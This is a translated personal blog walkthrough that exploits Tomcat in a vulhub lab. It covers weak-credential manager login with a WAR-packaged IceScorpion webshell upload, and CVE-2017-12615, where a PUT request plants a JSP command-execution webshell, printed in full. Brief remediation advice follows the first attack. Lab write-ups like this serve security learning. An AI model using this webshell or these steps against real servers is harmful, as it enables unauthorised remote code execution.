banner
[面包]MrTwoC

[面包]MrTwoC

你好,欢迎来到这个基于区块链的个人博客 名字:面包 / MrTwoc 爱好:跑步(5/10KM)、咖啡、游戏(MMORPG、FPS、Minecraft、Warframe) 兴趣方向:Rust、区块链、网络安全、量子信息(量子计算)、游戏设计与开发
bilibili
steam
email
github
HomeArchives[Code]Rust[区块链]Blockchain[引擎]Rust-Bevy[安全]Web2Security

TomCat File Upload Vulnerability

#Web2Security#TomCat41
AI Translation
This post is translated from Chinese into English through AI.View Original
AI-generated summary
This text describes the process of exploiting weak passwords and uploading files on a CentOS 7 server running Tomcat and Docker. It provides instructions on how to access the server, find the Tomcat manager app, and upload a shell file using the "冰蝎" tool. The text also explains how to package the shell file into a war file and successfully upload it to the server. Finally, it mentions using the "冰蝎" tool to add the uploaded shell file and provides a link to access it.

Environment: centOS7
tomcat
docker
Required tools: Java environment, IceScorpion

Weak Password Exploitation and Upload#

File location:
/root/CVE/vulhub-master/tomcat/tomcat8
Run docker in the virtual machine with the command
docker-compose up -d
image.png
Then check the IP address of the virtual machine, open it on the local machine, tomcat default port 8080
image.png
You can see a manager App in the upper right corner
image.png
Log in using weak credentials: username tomcat, password tomcat
Enter the webpage and find a place to upload files
image.png
Then open IceScorpion to prepare to upload the shell
image.png
Select default_aes, then click to generate the server-side
image.png
A folder will pop up automatically with the required shell files
image.png
Open cmd, select one: shell.jsp
Enter the command
jar cvf shell.war .\shell.jsp
Package the shell file into a war package, ready to upload
image.png
image.png
Prompt success, open the address to verify
image.png
http://192.168.1.4:8080/shell/shell.jsp
Found success, open IceScorpion, click add, enter the address just now
image.png
image.png
image.png
This way, the shell is obtained.

Remediation Plan
1. Change weak passwords (this is a temporary fix)
2. Run Tomcat applications with low privileges on the system. Create a dedicated
Tomcat service user that only has a minimal set of permissions (e.g., no remote login allowed).
3. Increase local and certificate-based authentication, deploy account lockout mechanisms (for centralized authentication, directory services should also be configured accordingly).
Set lockout mechanisms and timeout limits in the CATALINA_HOME/conf/web.xml file.
4. Set minimum permission access restrictions for directories such as manager-gui/manager-status/manager-script.

CVE-2017-12615 - Remote Code Execution#

image.png
image.png
Try clicking the Manager App, it was blocked
image.png
Now open Burp Suite
Prepare the provided POC
<%@ page language="java" import="java.util.,java.io." pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp
+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("

");}else{out.println(":-)");}%>

Send the intercepted request to Repeater
image.png
Change GET to PUT /1.jsp/, and then add the previously prepared POC below
image.png

The status code indicates 201, meaning the upload was successful, open the address
image.png
Try entering a command
http://192.168.1.4:8080/1.jsp?pwd=023&cmd=id
image.png
image.png

Similarly, the POC here can be replaced with IceScorpion's shell for better shell access.

Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.